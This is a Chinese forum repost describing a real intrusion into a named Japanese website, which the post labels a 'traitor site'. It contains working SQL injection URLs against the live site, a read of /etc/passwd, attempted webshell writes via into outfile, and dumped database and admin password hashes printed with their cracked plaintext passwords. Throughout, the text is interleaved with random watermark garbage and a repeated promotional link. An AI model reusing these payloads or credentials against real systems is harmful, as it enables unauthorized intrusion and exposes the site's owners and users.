原创 检测汉奸站全过程

xiancda

补：www.zuaa.jp测试

4 F, T1 f$ P3 B, q) Y
. p2 s4 W# x) r( K$ m3 a0 K* @0x01. 检测 www.zuaa.jp 收集数据


1 S5 _" \( A% o3 T# n  c* wwhatweb

4 m3 S6 I$ A' B& m# U. k8 q) U, A
利用NMAP扫描
! B# {7 y6 a: H2 b2 M, Q
. ]) H# Z" e1 Q2 e. w8 Z中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
# {; n% K/ y" r& \0x02.找注入点
- x6 @. l9 }# R. |1 P5 {找注入点：http://www.zuaa.jp/php/newsdetail.php?topic_id=390


2 U0 `% }+ ?" @: ?  D0x03.order by
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1

order by 28报错，order by 27正常
8 L- j6 }* {% a, i" H
0x04.   union手动查询
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
8 _( \  m# a0 o" s, @+ P添加到 27 时正常显示
% d2 k9 I7 Y5 g/ M6 C
$ j1 h5 Q: `, @; F( g7 B中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
: V0 }% ]8 g. G/ h
0x05. info:
7 Y" V' I  C& M+ q% S3 lhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

user:            root@localhost
database:    openpne
1 G* K" ]5 S+ [3 tversion:      4.1.22
os:             portbld-freebsd5.4

& p: W; i& A5 W* T0x06. root用户
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的（这种方法， 可以过大多数站）
+ `7 d- }3 i* n! L3 [http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

通过工具转换
, U3 ^! q" @& ?3 Y  P& c
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
" T4 w% @+ [5 F# N! _6 P8 |
, q% k( \' P% {8 {0x07. 利用 into outfile
( J& C: |$ }# m  j) _9 U全部都失败
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
3 |2 y' ?2 g& y
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php

页面显示“MDB2 Error:syntax error”
, D1 ~& V  N4 Y! q
+ G4 L0 D) k3 J+ i  S0x08. 利用 mysql 4.1
猜常规表名，字段未果 工具 sqlmap
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
' l% K% g. z/ S7 t. {/ k
( w9 {2 l& c; ?

! q5 B( B* X# p; Q& H0x09. 查找后台
利用 现有的各种 后台工具尝试都不行
0 s0 ~0 M* [" H5 U
* m. f3 `: P+ _9 J) C0x10.  MySL外联方法
从前面 nmap 收集的信息当中，可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码，然后再通过 mysql 工具外连 www.zuaa.jp 不行
# c% L% p) \: R8 Z7 a$ D  x可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
3 }/ L. Q! s7 j, M7 G) `
这个可以在 www.cmd5.com 解密
0 H& w% m$ W- A1 m6 groot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
3 y7 ?+ D8 Y2 ]; P0 P# }zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
工具外连失败，据说防火墙策略只允许特定IP外连，具体不得知


* N! x( e0 H; Y6 T" z0 L5 v0x11. 网站突破
发现网站的源程序 openpne, google 下载 openpne 源码

6 b0 C0 V. X7 ^+ X2 Z
0x12. 默认信息利用
http://sns.zuaa.jp/?m=admin&a=page_login
1 s1 k/ `2 V- m- U% a- o
/ U3 ^+ ]/ K; `表名 (c_admin_user) ，字段名（username,password）
4 X6 [5 I5 k: h$ B4 V3 `- _http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
0 p: }% v5 }2 ?" `. H
; u( M: M1 F8 v$ i$ ?$ ~6 u解密
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
" W, U! U0 j0 o* _0 ~zuaajp:c0923ec5857796a393da99905008c176,          zju1897
7 ~9 g8 c$ H  Y! ]
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
' y& I  Z' N- h7 c7 E
5 g' E/ i% v4 l; Z1 B" `0 }0x13. 登录后台



0x14. 小结
& a$ z) w4 s( q, ~利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 。
) m) j( J; o+ T感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
. s- t9 F3 y, |( x5 C------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

+ h- Z) U( Z, I1 b7 G最后声明：本人只负责了整理上传到论坛，让大家学习，不是原作者，原作者辛苦了！

荒村狂客

哪个牛人 费的这劲 入侵的